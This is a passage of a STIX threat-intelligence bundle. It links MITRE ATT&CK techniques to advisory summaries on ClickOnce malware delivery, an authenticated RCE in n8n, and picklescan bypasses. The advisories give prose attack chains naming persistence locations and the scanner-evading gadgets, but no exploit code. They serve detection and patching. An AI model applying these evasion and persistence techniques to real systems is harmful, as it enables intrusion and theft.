      "source_ref": "report--5a3f278b-c9ad-550c-9254-cf49d9c254e4",
      "target_ref": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Masquerading",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1036",
          "url": "https://attack.mitre.org/techniques/T1036"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e283d86e-68d6-5246-b2c3-55108b54c7a1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5a3f278b-c9ad-550c-9254-cf49d9c254e4",
      "target_ref": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ingress Tool Transfer",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1105",
          "url": "https://attack.mitre.org/techniques/T1105"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--76515aba-aa3a-5038-8c3d-534afbb6614b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5a3f278b-c9ad-550c-9254-cf49d9c254e4",
      "target_ref": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--5a3f278b-c9ad-550c-9254-cf49d9c254e4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Threat Actors Weaponize Microsoft ClickOnce for Persistent Malware Delivery and Execution",
      "description": "## Overview\n\nThreat actors are increasingly exploiting Microsoft's ClickOnce technology as a sophisticated method for malware delivery and maintaining persistence on compromised systems. This new abuse, highlighted by CrowdStrike, takes advantage of ClickOnce's design which allows applications to be deployed with minimal user interaction, often requiring just one or two clicks. The method enables attackers to bypass traditional security controls like email filters and evade scrutiny, as `.application` files are often less scrutinized than standard executables. A key feature exploited is ClickOnce's built-in update mechanism, which allows attackers to modify deployed malware by pushing new payloads from a controlled server without additional user consent. Furthermore, adversaries achieve stealthy execution by operating within legitimate Microsoft processes such as `rundll32.exe` and `dfsvc.exe`, making detection challenging for defenders. This technique significantly lowers the bar for entry, as ClickOnce applications do not require elevated privileges for installation, targeting standard user accounts that comprise the majority of enterprise endpoints.\n\n## Attack Chain\n\n1.  **Initial Access**: Threat actors leverage social engineering to trick users into clicking a malicious link or button, often on a webpage, that initiates a ClickOnce application deployment.\n2.  **Initial Execution**: The user's click triggers the ClickOnce deployment process, which legitimately invokes Microsoft's `dfsvc.exe` (ClickOnce Deployment Service) and potentially `rundll32.exe` to process the `.application` manifest and execute the initial malicious payload.\n3.  **Bypass Defenses**: The `.application` file and subsequent execution often fly under the radar of traditional security tools and user scrutiny due to their perceived legitimacy compared to standard `.exe` files.\n4.  **Persistence (Shortcut)**: The attacker configures the ClickOnce application to be available offline. Upon installation, a malicious `.appref-ms` shortcut file is dropped into the user's Start Menu.\n5.  **Persistence (Autostart)**: The attacker places the malicious `.appref-ms` file into the Windows Startup folder (e.g., `%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup`) or creates a scheduled task to automatically launch it upon user login or at a specific interval.\n6.  **Defense Evasion (Process Hiding)**: Malicious code executes within the context of legitimate Microsoft processes (`dfsvc.exe`, `rundll32.exe`), blending with normal system activity and making it difficult for security solutions to differentiate benign from malicious behavior.\n7.  **Command and Control / Payload Update**: By controlling the deployment server, the attacker can push malicious updates to the ClickOnce application at any time, allowing for dynamic changes to command and control (C2) addresses, downloading additional tools (Ingress Tool Transfer), or modifying malware functionality without further user interaction.\n8.  **Impact**: The updated malware establishes persistent remote access, facilitates lateral movement, exfiltrates data, or performs other malicious activities leading to further system compromise.\n\n## Impact\n\nThe abuse of ClickOnce technology leads to significant security risks, primarily through stealthy malware delivery and persistent access. Victims face the risk of system compromise without immediate detection, as the initial execution and subsequent updates blend into legitimate system processes. This technique bypasses common security mechanisms, making organizations vulnerable to remote access, data exfiltration, and the deployment of additional malicious payloads. While no specific victim count is provided, the described techniques are broadly applicable across Windows environments, targeting any user susceptible to social engineering, regardless of sector.\n\n## Recommendation\n\n*   Enable Sysmon Event ID 11 (FileCreate) logging to detect the creation of suspicious `.appref-ms` files in critical directories, such as the Startup folder, and deploy the \"Persistence via ClickOnce .appref-ms in Startup Folder\" Sigma rule to your SIEM.\n*   Educate end-users about the risks associated with ClickOnce applications, especially those originating from untrusted sources, and train them to identify misleading buttons or prompts.\n*   Implement application whitelisting or strict application control policies to prevent the execution of unauthorized ClickOnce applications or limit their privileges, reducing the effectiveness of this attack vector.\n*   Monitor network traffic for unusual outbound connections from `dfsvc.exe` or `rundll32.exe` that are not consistent with known legitimate ClickOnce application update patterns.\n",
      "published": "2026-07-04T06:53:11Z",
      "labels": [
        "clickonce",
        "persistence",
        "malware-delivery",
        "windows",
        "defense-evasion"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
        "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
        "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-two/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0497ec4b-9bc5-5943-bf23-a5901efdf7a7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3cd1cdc8-a14b-5745-9a5c-705c743fd022",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bd60ed8a-8444-5782-8982-55c5e1d3bbac",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3cd1cdc8-a14b-5745-9a5c-705c743fd022",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3cd1cdc8-a14b-5745-9a5c-705c743fd022",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "New Abuse of Microsoft ClickOnce Technology for Malware Distribution",
      "description": "## Overview\n\nCrowdStrike recently detailed a new method of abusing Microsoft's ClickOnce technology, a deployment mechanism designed for simplified application distribution and updates on Windows systems. While ClickOnce offers developers an easy way to deploy software with minimal user interaction and without requiring administrative privileges, threat actors are exploiting these very features to spread malware. This initial part of a two-part series (published June 18, 2026) explains the underlying mechanics of ClickOnce, from application publishing to installation, highlighting its user-friendly deployment journey. For defenders, this research is crucial as it details how a legitimate Windows feature can be weaponized for initial access and execution of malicious payloads, potentially bypassing traditional security controls due to its inherent design.\n\n## Impact\n\nThe primary impact of ClickOnce abuse is the facilitated distribution and execution of malware on Windows endpoints. By leveraging ClickOnce, threat actors can bypass traditional application installation hurdles, potentially leading to widespread compromise across various sectors. The technology's design, which allows deployment without elevated privileges and minimal user interaction, lowers the barrier for attackers to establish initial access and execute arbitrary code, leading to data exfiltration, ransomware deployment, or further system compromise. The article does not specify victim counts or targeted sectors, but the nature of the abuse suggests broad applicability for any organization using Windows systems.\n\n## Recommendation\n\n*   Ensure comprehensive `process_creation` and `file_event` logging is enabled on `windows` endpoints to capture ClickOnce application deployment activities, as described in this brief.\n*   Review your current application deployment policies to identify and mitigate risks associated with unsigned or untrusted ClickOnce applications, specifically those that leverage the features of ClickOnce as described in the 'Overview' section of this brief.\n",
      "published": "2026-07-04T07:32:52Z",
      "labels": [
        "clickonce",
        "malware-delivery",
        "initial-access",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-one/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b078e843-b678-586b-995b-4906f7bdbbeb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c8f43441-37ce-5015-80a4-54ea6dff1836",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--465f25c7-28c6-5dda-85a5-b59ffce4401c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c8f43441-37ce-5015-80a4-54ea6dff1836",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d1c39bb1-06ce-58ef-8f88-389eb23486e2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c8f43441-37ce-5015-80a4-54ea6dff1836",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ab05fc7d-681c-5388-9221-73c7e6a5367d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c8f43441-37ce-5015-80a4-54ea6dff1836",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c8f43441-37ce-5015-80a4-54ea6dff1836",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2025-71380: Authenticated Remote Code Execution in n8n via Execute Command Node",
      "description": "## Overview\n\nCVE-2025-71380 describes a high-severity improper access control vulnerability (CWE-284) affecting n8n, an open-source workflow automation platform, specifically in versions up to and including 1.114.4. The vulnerability resides within the \"Execute Command\" node, a feature intended to allow workflows to run system commands. However, due to insufficient restrictions, any authenticated user can leverage this node to execute arbitrary commands on the host system where the n8n instance is running. This flaw grants attackers with existing user access or compromised credentials the ability to achieve remote code execution, which can lead to severe consequences, including full system compromise, sensitive data exfiltration, or denial of service through service disruption. The discovery and disclosure of this vulnerability underscore the critical importance of proper access controls in internal application functionalities.\n\n## Attack Chain\n\n1.  An attacker obtains valid credentials for an n8n user account through various means, such as phishing, credential stuffing, or exploiting another vulnerability.\n2.  The attacker logs into the compromised n8n instance using the legitimate, but compromised, user account.\n3.  The attacker creates a new n8n workflow or modifies an existing one to include the \"Execute Command\" node.\n4.  Within the \"Execute Command\" node's configuration, the attacker specifies malicious commands to be executed on the host operating system.\n5.  The attacker then triggers the crafted workflow, either manually from the n8n interface or by configuring a scheduled or event-driven trigger.\n6.  Upon execution, the n8n application, running on the host system, spawns child processes to execute the arbitrary commands provided by the attacker.\n7.  These malicious commands then perform actions such as establishing persistence, escalating privileges, exfiltrating sensitive data, or deploying additional malware.\n8.  The attacker achieves their final objective, which could be full system compromise, data theft, or disruption of services.\n\n## Impact\n\nThe successful exploitation of CVE-2025-71380 allows authenticated attackers to gain remote code execution on the underlying host system, regardless of the operating system (Windows, Linux, macOS). This can lead to a complete compromise of the n8n server and any data or systems it has access to. Potential impacts include unauthorized access to sensitive data stored on or accessible by the n8n instance, disruption of critical business processes automated by n8n, deployment of ransomware or other malicious payloads, and lateral movement within the compromised network. While no specific victim count is available, any organization utilizing vulnerable n8n versions with reachable administrative interfaces is at risk.\n\n## Recommendation\n\n*   Immediately update n8n to a patched version beyond 1.114.4 to remediate CVE-2025-71380 as per the official advisories in the references.\n*   Implement strict network segmentation for n8n instances, limiting access to trusted internal networks and specific administrative users.\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect unusual command execution by the n8n process.\n*   Ensure robust credential hygiene for all n8n user accounts, enforcing strong, unique passwords and multi-factor authentication.\n",
      "published": "2026-07-04T02:31:37Z",
      "labels": [
        "RCE",
        "vulnerability",
        "n8n",
        "workflow-automation",
        "command-execution",
        "improper-access-control"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71380"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/n8n-io/n8n/security/advisories/GHSA-365g-vjw2-grx8"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/n8n-arbitrary-command-execution-via-execute-command-node"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f41f83bd-b375-5e1d-aef5-5f37cdc8323b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d6409a53-f884-5f40-a6a2-64f889b5ae7f",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d6409a53-f884-5f40-a6a2-64f889b5ae7f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2025-71375: Picklescan Arbitrary Code Execution via _operator.methodcaller Evasion",
      "description": "## Overview\n\nA critical vulnerability, tracked as CVE-2025-71375, has been identified in the `picklescan` Python library, affecting all versions before 0.0.34. This flaw allows malicious actors to bypass security checks designed to detect harmful code within Python pickle files. Specifically, `picklescan` fails to recognize the `_operator.methodcaller` built-in function as a potential threat vector. Attackers can leverage this oversight to embed arbitrary code within a pickle payload. When such a specially crafted payload is subsequently loaded by an application using Python's standard `pickle.load()` function, the embedded malicious code will execute, leading to potential system compromise. This vulnerability is significant for organizations that process or share Python pickle files and rely on `picklescan` for their security posture.\n\n## Attack Chain\n\n1.  Attacker crafts a malicious Python pickle payload, meticulously designed to leverage the `_operator.methodcaller` built-in function to embed arbitrary code.\n2.  The malicious pickle payload is delivered to a target system, potentially as part of an uploaded file, a network stream, or a malicious data artifact exchanged between services.\n3.  A system or application utilizing the `picklescan` library (version prior to 0.0.34) attempts to scan the received pickle file for malicious content to ensure its safety before processing.\n4.  Due to the vulnerability (CVE-2025-71375), `picklescan` fails to identify the `_operator.methodcaller` based malicious code within the pickle payload, allowing it to be marked as \"safe\" or undetected.\n5.  The legitimate application or service then proceeds to load the unsanitized (and still malicious) pickle file into memory using Python's `pickle.load()` function.\n6.  Upon deserialization, the `_operator.methodcaller` embedded in the pickle payload triggers the execution of the attacker's arbitrary code within the context and privileges of the vulnerable application.\n7.  The attacker achieves arbitrary code execution, which can lead to data exfiltration, system compromise, establishment of persistence, or further network pivoting within the victim's environment.\n\n## Impact\n\nThe successful exploitation of CVE-2025-71375 grants attackers arbitrary code execution capabilities on the affected system. This can lead to severe consequences, including full system compromise, sensitive data exfiltration, denial of service, or the deployment of further malware such as ransomware. While no specific victim count or targeted sectors are mentioned, any organization or developer using `picklescan` before version 0.0.34 to sanitize Python pickle files is at risk. The CVSS v3.1 base score of 8.1 (High) underscores the critical nature of this vulnerability, highlighting that it can be exploited remotely without authentication, requiring only user interaction (e.g., loading the malicious pickle).\n\n## Recommendation\n\n*   Patch CVE-2025-71375 immediately by upgrading the `picklescan` library to version 0.0.34 or higher in all development, staging, and production environments.\n*   Implement strong input validation and deserialization policies, assuming any untrusted pickle file, even those scanned by vulnerable versions of `picklescan`, may contain malicious code.\n*   Review existing codebases for instances of `pickle.load()` being used on data from untrusted sources, even if processed by `picklescan`.\n",
      "published": "2026-07-04T02:30:22Z",
      "labels": [
        "vulnerability",
        "rce",
        "deserialization",
        "python",
        "picklescan"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71375"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-955r-x9j8-7rhh"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/picklescan-undetected-remote-code-execution-via-operator-methodcaller"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a3482375-b4fe-5ca2-bc6b-d1dd3ad2ebdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4dcfa68d-5dde-5c23-a26d-9f3cc1874426",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4dcfa68d-5dde-5c23-a26d-9f3cc1874426",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2025-71373: Picklescan Bypass via `operator.methodcaller` Leads to Arbitrary Code Execution",
      "description": "## Overview\n\nCVE-2025-71373 details a critical vulnerability affecting `picklescan` versions before 0.0.33, a tool designed to validate the safety of Python pickle files. This flaw allows remote attackers to circumvent the security mechanisms by embedding `operator.methodcaller` function calls within crafted pickle files. `picklescan` fails to detect these specific calls, mistakenly deeming the malicious files as safe. Consequently, any system that processes these specially crafted pickle files and relies on the vulnerable `picklescan` for validation will execute the embedded arbitrary code upon loading the file, leading to full system compromise. This vulnerability carries a CVSS v3.1 base score of 8.1 (High), highlighting its severe impact and ease of exploitation.\n\n## Attack Chain\n\n1.  An attacker crafts a malicious Python pickle file containing arbitrary code embedded within `operator.methodcaller` function calls.\n2.  The attacker delivers this malicious pickle file to a target system, potentially via email, file upload functionality, or as part of a data exchange.\n3.  The target system, which is configured to process Python pickle files, receives the malicious payload.\n4.  The system invokes `picklescan` (version prior to 0.0.33) to validate the safety and integrity of the incoming pickle file.\n5.  During validation, `picklescan` fails to correctly identify and flag the `operator.methodcaller` function calls as malicious, allowing the bypass of its security checks.\n6.  The target application, erroneously assuming the pickle file is safe based on `picklescan`'s flawed validation, proceeds to load the file into memory.\n7.  Upon loading, the arbitrary code embedded within the `operator.methodcaller` context is executed on the target system.\n8.  The attacker achieves arbitrary code execution, leading to system compromise, which can involve data exfiltration, further persistence, or other malicious actions.\n\n## Impact\n\nSuccessful exploitation of CVE-2025-71373 grants remote attackers arbitrary code execution capabilities on affected systems. Organizations utilizing `picklescan` for validating pickle files, particularly in data processing pipelines or applications handling untrusted serialized Python objects, are at risk. This could lead to complete compromise of the affected servers or workstations, potentially resulting in data breaches, installation of malware, or disruption of critical services. The CVSS score of 8.1 reflects the high severity, indicating that an unauthenticated attacker can achieve high confidentiality and integrity impact with low attack complexity.\n\n## Recommendation\n\n*   Immediately update `picklescan` to version 0.0.33 or later to patch CVE-2025-71373.\n*   Ensure all applications handling Python pickle files validate their source and integrity rigorously, even when using security scanners.\n*   Implement robust input validation and sanitization for all external inputs, especially those that might involve deserialization of data, to prevent malicious pickle files from being processed.\n",
      "published": "2026-07-04T02:29:27Z",
      "labels": [
        "vulnerability",
        "rce",
        "picklescan",
        "python",
        "deserialization"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71373"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-x843-g5mx-g377"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/picklescan-remote-code-execution-via-operator-methodcaller-detection-bypass"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--448f40d6-a263-5782-b808-b0ecd5178ed9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/mmaitre314/picklescan/security/advisories/GHSA-rrxm-2pvv-m66x",
      "pattern": "[url:value = 'https://github.com/mmaitre314/picklescan/security/advisories/GHSA-rrxm-2pvv-m66x']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T02:28:44Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--31b5e572-d41b-5e14-9c19-8c6f87f554b1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--073e03d5-3194-5a5c-93bc-5768098aba8a",
      "target_ref": "indicator--448f40d6-a263-5782-b808-b0ecd5178ed9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ca709584-f9b2-5121-908e-35d6e905791d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.vulncheck.com/advisories/picklescan-arbitrary-code-execution-via-numpy-f2py-crackfortran-getlincoef-gadget",
      "pattern": "[url:value = 'https://www.vulncheck.com/advisories/picklescan-arbitrary-code-execution-via-numpy-f2py-crackfortran-getlincoef-gadget']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T02:28:44Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b5ff4551-86c4-5f2b-bd86-613474215195",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--073e03d5-3194-5a5c-93bc-5768098aba8a",
      "target_ref": "indicator--ca709584-f9b2-5121-908e-35d6e905791d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1ca575ea-d1da-5ad3-a20c-52c5080a86c5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--073e03d5-3194-5a5c-93bc-5768098aba8a",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a2bbc1a7-f032-500e-86d9-c38716e236cb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Supply Chain Compromise",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1195",
          "url": "https://attack.mitre.org/techniques/T1195"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2723b95e-b00d-5747-8669-301f8bbd2e80",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--073e03d5-3194-5a5c-93bc-5768098aba8a",
      "target_ref": "attack-pattern--a2bbc1a7-f032-500e-86d9-c38716e236cb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--073e03d5-3194-5a5c-93bc-5768098aba8a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2025-71372: Picklescan Deserialization Vulnerability (Numpy Gadget)",
      "description": "## Overview\n\nCVE-2025-71372 addresses a significant security flaw in Picklescan versions before 0.0.33. Picklescan, a tool designed to analyze Python pickle files for malicious content, specifically fails to identify the `numpy.f2py.crackfortran.getlincoef` gadget when it's present within a pickle file's `__reduce__` method. This oversight enables attackers to craft highly potent malicious pickle files that can contain and execute arbitrary Python code. When such a specially crafted pickle file is subsequently loaded by a Python application, the embedded code will execute, completely bypassing Picklescan's intended security defenses. This vulnerability poses a severe risk of supply-chain poisoning, particularly in environments where machine learning models or other data are exchanged as pickle files, as it allows attackers to inject malicious code into trusted data streams.\n\n## Attack Chain\n\n1.  **Attacker Crafts Malicious Pickle File**: An attacker creates a Python pickle file designed to exploit the vulnerability. This file specifically incorporates the `numpy.f2py.crackfortran.getlincoef` gadget within a `__reduce__` method, embedding arbitrary Python code for execution.\n2.  **Distribution of Malicious File**: The malicious pickle file is distributed to target systems or users, often disguised as a legitimate shared resource, such as a machine learning model, dataset, or configuration file.\n3.  **Picklescan Bypass**: The victim organization uses Picklescan (version prior to 0.0.33) to scan the received pickle file for security threats. Due to the vulnerability, Picklescan fails to detect the embedded malicious gadget.\n4.  **Legitimate Loading**: A Python application within the victim's environment, believing the file to be safe due to the bypassed scan, loads (deserializes) the pickle file using standard Python `pickle.load()` functions.\n5.  **Gadget Invocation**: During the deserialization process, Python's `pickle` module encounters and invokes the `__reduce__` method containing the malicious `numpy.f2py.crackfortran.getlincoef` gadget.\n6.  **Arbitrary Code Execution**: The arbitrary Python code embedded by the attacker within the gadget is executed on the system with the privileges of the Python application, leading to compromise, data exfiltration, or further system manipulation.\n7.  **Supply Chain Poisoning**: If the compromised system then shares derived or new model files, the malicious code could propagate, leading to wider supply-chain poisoning.\n\n## Impact\n\nThis vulnerability carries a high impact, allowing for arbitrary code execution and enabling supply-chain poisoning of shared model files. If successfully exploited, attackers can gain full control over the system where the malicious pickle file is loaded, leading 